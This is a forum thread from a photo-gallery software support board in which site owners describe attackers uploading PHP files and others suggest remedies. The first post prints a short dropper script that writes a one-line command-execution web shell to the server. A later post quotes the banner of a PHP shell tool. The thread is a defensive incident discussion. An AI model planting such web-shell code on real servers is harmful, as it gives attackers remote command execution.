Site hacked.. Site hacked..
 

News:

CPG Release 1.6.26
Correct PHP8.2 issues with user and language managers.
Additional fixes for PHP 8.2
Correct PHP8 error with SMF 2.0 bridge.
Correct IPTC supplimental category parsing.
Download and info HERE

Main Menu

Site hacked..

Started by togi, February 27, 2006, 01:47:46 AM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

togi

My site was hacked once.. upgraded it to a newer version and it seems like I am getting stange visitors..
I have limited uploads to images and txt/pdf and movies..

How do i stop these hacker from coming back?

here is one of the files uploaded.. title is pip.php

<?php
     $suntzu=fopen("shell.php","w");
     fputs($suntzu,"<?php system(\$HTTP_GET_VARS[CMD]);?>");
     fclose($suntzu);
     chmod("shell.php",777);
?>


there was another guy today.. but deleted it without saving..
he uploaded a imagename.php.jpg ... i found it fishy so i deleted it..

would like to hear meaasures others have taken to make the site free from
hackers.. thank you very much!


kegobeer

Here are some ideas:

Don't allow visitors to upload files.  Verify all of your members prior to allowing them to upload files.  Only allow jpeg files.
Do not send me a private message unless I ask for one.  Make your post public so everyone can benefit.

There are no stupid questions
But there are a LOT of inquisitive idiots

togi

Thanks for the tip.. i set the movie, audio and document type to "none" is that ok?  i set images to jpg/gif/tif

Abbas Ali

Upgrade to 1.4.4 asap. The above file "pip.php" which was uploaded to your site is because of recent vulnaribility found in cpg. The hacker must have extracted your database password and other details. Please change them asap.
Chief Geek at Ranium Systems

Fudgemaster

I got a new user also, uploaded 2 files.
123.php.php.rar and 123.php.php7.rar

Both are php files..


*****************************************************************************************
*                           PHPSHELL.PHP  BY MACKER     30 March 2003                   *
*****************************************************************************************
*                                                                                       * 
*   Welcome to Macker's PHPShell script...                                              *
*   This script will allow you to browse webservers etc...                              *
*   Just copy the file to your directory and open it in your Internet Browser.          *
*                                                                                       *
*   The webserver should support PHP...                                                 *
*                                                                                       *
*   You can modify the script if you want, but please send me a copy to:                * 
*                               DRAZZ01@HOTMAIL.COM                                     *
*****************************************************************************************

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!   PLEASE NOTE: You should use this script at own risk, it should do damage to the   !!
!!                Sites or even the server... You are responsible for your own deeds.  !!
!!                The admin of your webserver should always know you are using this    !!
!!                script.                                                              !!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
*/


Damnit. and all because of me. I upgraded to 1.4.3 and didn't realize the upload permissions get reseted in upgrade =(
The remotethingamajigger update is applied now and passwords are renewed.

Gotta go thru every dir etc. for crap  :'(
--
It's an insane world.. But I'm proud to be a part of it.

Stramm

Fudgemaster...
if your server is properly configured then it won't parse rar as php and your box didn't get hacked at all. Just a lame try of a script kiddie with no effect at all. Still it's best to disable all extensions you don't need

Fudgemaster

Quote from: Stramm on February 27, 2006, 02:29:17 PM
Fudgemaster...
if your server is properly configured then it won't parse rar as php and your box didn't get hacked at all. Just a lame try of a script kiddie with no effect at all. Still it's best to disable all extensions you don't need

Oh thank You. that was a relief to hear.
I almost soiled myself at work today when I noticed that extra crap on my
site because I've never allowed anyone else than myself to upload anything.
--
It's an insane world.. But I'm proud to be a part of it.